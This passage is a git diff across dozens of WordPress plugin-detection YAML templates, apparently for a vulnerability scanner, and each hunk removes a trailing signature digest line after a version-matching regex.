b/http/technologies/wordpress/plugins/font-awesome.yaml index 139b174f9d..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ff6e9e7a4b7af0c61f24625a03e4c3a0b27f8472227611f328d8eb1b77ba40f02201725bba198101b57963307dc523d82c6710b929edfd7b81d68c029871ec2468d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 85b1b16cd6..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd67c7cad798b12d8c7e784f78dbf20c73fd5c0056e70f2b20e4a96c30b7c9c9022032970b38df94549078c8f2f15b8a0232650252afd328c1dc62d67f838d83380e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 6da78477a6..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3be46951b4c6f594708e58865f5c0c98a673ba7315420a59e0288afe96bf68f022100d2e2d10ad7acf98ebe63cebbe2105e789fa201e47086e654a0a466b621a0bef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index b66b1df938..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220761e14cbc5cee2d4598159cb9d0eebe59d4d32c5021777ea065b25dd516edbc60220599cbfee8cf653644fb54c68cb23e9bdd05b3be4c1f04c84629548462b62cc86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 47c19f7450..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1f6e4dddbf6189ec24b303df5f9fb219dcaae9adc46f0a596d7b599f1fda42e022100e4607390aa0009b5e950d13c855eedfe655bb6fe3c7a36368821089d1b661cc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index dbcae17bcf..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc7d6e2d73eb79b2f65b6327dd3efa4abd55de277d379cc77796c4390374f929022100c9768abf053f46875258d8dc6664490900013165d98c3e056cdb47432bd6bcdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 349b5b498c..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2ee65a807503050fe94546a3b63a68401abdfc334a5c9181337c1124bee0b1a022032ffee7ee276059a54a8cf96100e3be6016b279d819e7287f7fb348e78ad922b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 9f0c10fbc5..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8a107f2e98704a3e6ec0ce84889991e1e7322c4cd957ef226d4dd7f2138a2f2022100971ef8e5eaed9cd47f7ee1cdb98b2b10a66dd440d706a215e6f0c4737a21913a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 076b0e2913..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fef7708e766e4084a8e42c7b236f27a02d5b478a274ecc1e3390eff141c909e7022100c394ea0d0680d0473ed81c681938fa0d4da55a436a252f4479bf9dc17120420f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index efadb0f09f..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc4a78abb3b36f4de5ca543a330af8fffcc4df4b7e9fb672ba94af3a84627e000221008bd84a833c2df39bfd648908c566796f5b13d97f9a04243821cc2338e93a6d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 7e735d644e..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030595eafffedf9b89f235adbfd0841c976ade9dd6f8f990bce14295295717a5502200be0ff7355d95bd1bbb3c66bf6a2dfb5c45e32afcee4239cb5d442be3e7f9bfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 6ba9b5f2db..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100baff57bf2654caa12f8990663437a5fdfb186508345aba3d5c041473b93659e302202c5adaf8aaeb2e101c8db3f7e8a2309f2fb549947a6a13f5276119663c54a49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 1d5bf37717..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd64fe4ee3f3d49087dd8ceecbf1621b6af87802a1e2c7fe8f19bd45d262499502201086375249e4fbb0b1fe8d9c9aafcd35d97814cb08b16918e5ceb6ae90bc7dfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index eb9ad5c1b7..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ebf80adc7c169863d5736130b7baccb44d41de455cb70b6392a77048e7294819022010d9900168c4a09a84ad1ca2d7fecc00ad6e96889240d47034b669909794ba59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 34f96e18f5..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205757a9c842a9ee5261002d13e879690d3acbd56d7c4a7837fd8e7cd282772e33022033dd8f1505779e1a30cc95349d85c94fb4c26f10f8c292e7ff91378f137b166d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index c6d9a40082..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf7607652457f98ac33f2252bc02cf0cd5382f07a897b298f1213aff51c89f0f02203f4f6bde6c0b65e432cfda50da726fef9f78352404136be8dabe214e1ead5cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 8c544b6fc4..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2d1f2eedb1a01e3d9ac75e9fd7aa8a5bead037f428433b4a2011cfc3589e871022100c560555a68aff5eae9e148bd56ffa1df2eeed601b0c1a87075c3bd2f23661261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index e561bcffdb..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d13b1ec4c7417dbe8f5edc5509c1f1c2d5cb9ec78e6d793183d414fa6dd63559022010102565272834d901cbecfbb36956d11cf924f5e9e14c186d66a35de61af048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index d3660728af..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a12e1a0d0ea70bceadadbc4a3d15a8bb37e96a1634a07f2c23d0b4071df70e50221009c78925ac62cce2bc9c62c3e2ef92a8f0e2224c6ef0a97e5358a31d60644e849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 5e7efbf65b..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d8619e2b237023e58bbae3a0b21d4128acc8c37f5c82ee4e82aee308e5fe9730220368d359e28d1775b64b35e65402697104da61c30c8e8a7675c6d799697e59691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 3fd4c96103..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009e5bffc607e9345e130a52049915a7eb9df229e121a1286e1eb3d12302ec742e022100dfb624c46c5cd73410b9924366014f9f7ec1399c820f0af5dc505ef8cb5b0750:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 31c74427ee..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207102c9f229647847eb1df793dbafda3c10c7c305cc5d375a508acaaa6a46bb13022100c96eccad018c71aca863ef88162fcccd7cc018d1f59eed45c2b7d83321213326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index ea8675cc2d..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203809666890d98bf9d43971212befa2f776ecae4ac908ba43b4cfa3b81efea10f022013cdf49e6bd251636d793561d7e8b27a2062155705c9b0297db684edec7c917e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index f012f3f93d..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220095a4585f26f95353b1121ac40604b38c177c5714c8fcb778661ccf3e24622ca022100cf5052a2ab89ecf94d1027e047756bc254b86d7ec2feee61806a46a60ba2fd48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 028736d924..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052b8843cf222b591b6e6f59b040e289ba108ebaafd853860b7243b5d801def5b02204f6e3a651621ab67b242b3d770fb729702510ee74769833c520af058339a7258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 42a731bd9f..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039971a62cca44a7b6042a5916ab783820ba34771c1a9358c46cc7a4d6d0c94c20221008cfaa96d2d0ffd82fa079bf75cf41e4a0b58dd572fba8983552625da0b53be01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index b12d55596a..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fae921f57de429264a72a9de7522935e8e98cd045e9b9c8a02790499f4ca48910221009c467969fb109d0dbc31328a7232c5dc0edaae7208f9b862358f14aed34ae10a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index dfd85d34a9..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec517d247ffe0c2a82d2ef8b8ee0c9210a35e355a61a11dc92652e04701dc5a1022100c6c2bfc3ff611234f123613c5c0ebc465b418cfed8799d958c6bb5b95cdc04f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 89cb39f446..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022027f0db1259e487861e87d97f0c111416e2d60eac7898585b11e6f6c108f94501022100d256eab4f3adb22f2d06482f1acd66b0e06f32c108c3e79ee02925b68affcbe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 66c2857248..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040d8a47b8c332e59fedd2362ae0ba97f1404cce9beadfd259f04f46eaec1728402207a9999da9d2137c089b8c05a13043f2695bafff03a572a5e22189550b3947c07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index f3e0d59292..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032e332d570da51acbb9c98bf3b3d9d4c71667efdb1016fa5aa1bf7fc847e6a6902202f5aeb1c35070265e77c58fc8d2b996db1851c5804ee3709de1e91b807dd79be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 45adb29ee7..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ed7a34f95b2aff40ac4df2668937e37b5a8d3a358a25a70083c0642f33c4fbe02202a98c6da37907a9b8c645e9c5126e5d6d9eeefada58e39975d6b2599588f273b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 2b28979964..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c5e229c850e9dc4a8d959506c761841ab6a698c075e83250da749b8a7d5ff1802210081bbe21a659a69a36c3512ab539d0f82f02ecba9dd7c8ebd8c6003ccb52d85e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3586387ab2..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036d294ff7c4d488f17e87f8ab4a9a0ffeea25c474478672d67aa50876eb92ca2022100e485fcac51237f8761c2fbd4d7e08582e653c9a8bc49de545b538d6214602f47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 70dba3f4d0..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c53a0b8c4d7f07f825be1e030363d1b6692d4aaec1528553b1506b3bf2d336102203b59fff9bec6496ef35ca8bbcaa0e2612e5511a02d09e87de8dd761b1046c855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index ff1ab42fe9..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb930bf1dd3719ab9c26570f833dc732bfe6c179ab350976bbaeb171666ea83d022100c14040f70b6fbe70f9c892929b1807fa3c0c56f2a666ff54b23a9f16e9499796:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index dfcc17866a..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207404d5b33d9a0bf724acb5e8e75381095db80afbcef1db86226915d372b0157c022100bd4441ec24d8472362955f37594d5cea6490e2f2e7471617a262c938f1fdd16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index ae904072ad..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d148f126b7df186977b09f6a4c9fef3999b7a00fc5c98855f3b32993d3a62df5022100bbe80231c68b9f954673ba1d72b4105f63a127d53d1410b73669d028867e7a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index b8a0c65596..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204651ba300c511713102313e4966c96b681dad467bf9182d365357eb247a70816022100df4e435616867acb4f1bba06472790e3ac0a9d760c6865539a64125eb92c4364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ef76e9fd27..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207bfb59b71dd73051065f3c5639b2ad039367624f6e5703652cd55f5507f9087a022100f6fdb7a4dd53190964fadde93b71826caa86f42417515db5b24ed6b7a87292bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 2992da2f2f..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100859cafca079a32d131d72d3974f2149455ae515f0a2d0812ba29544e2c0479fb0221009cf24879d1af5cd936d19cf1ed4e4e718b150be9cb0bbe5b258597c2e986d32e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 9322a00b26..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fbd17613eac54169d0b6e55051216964bfdead93ab1cbf99d053d3303589043002205173801779b8c34da48bb29afef2253dd3c8febf8ac09089497d0574258b1781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 1b705a50c3..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d7a347cbc0d584deb170c7db8044b2e6195a89589994aeebcaf9ee2252ef01f022100afee5ffee0d4cbd88b304990660e7aec2a96b060cf571ad8a3bdd11d40cd16e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 2d4f20d32b..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d083e7e4a55311a3408f62ec55b001eb52fff5f36ded8f2f1a9f10fbb48a5b43022100f3f0cb578a283fdf8c7bd9ce5b6c4dd41f578ceb739c430a60e52b8f8882d04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 07fd473237..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100efcc40cc0e96ad2045b1e1cd1a42fe5492077c532e9dfe9aed6750b78d2b9c4802206de0b24096c443c64381230d948f2fff76af3a783bd765a5fe20e80ca950172b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 69a36bb5e8..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ecdf3d2cd15c1e801e3647bae282f25236e2747f9ef4879e572800d240692e640221008e4813a7f08ee4c7c45c864e7d0dad771ff8d1dbcdd15bf02b8281c2df6bfd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index d1bcac22a3..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f65773b65949fb183e21f197f8929710dc039141573aeff488331618795a7a2102200f437df95426f22e822791c702c98f3fce6694b483324ec2b1478ea2bc8aaab9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index e192bf7477..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 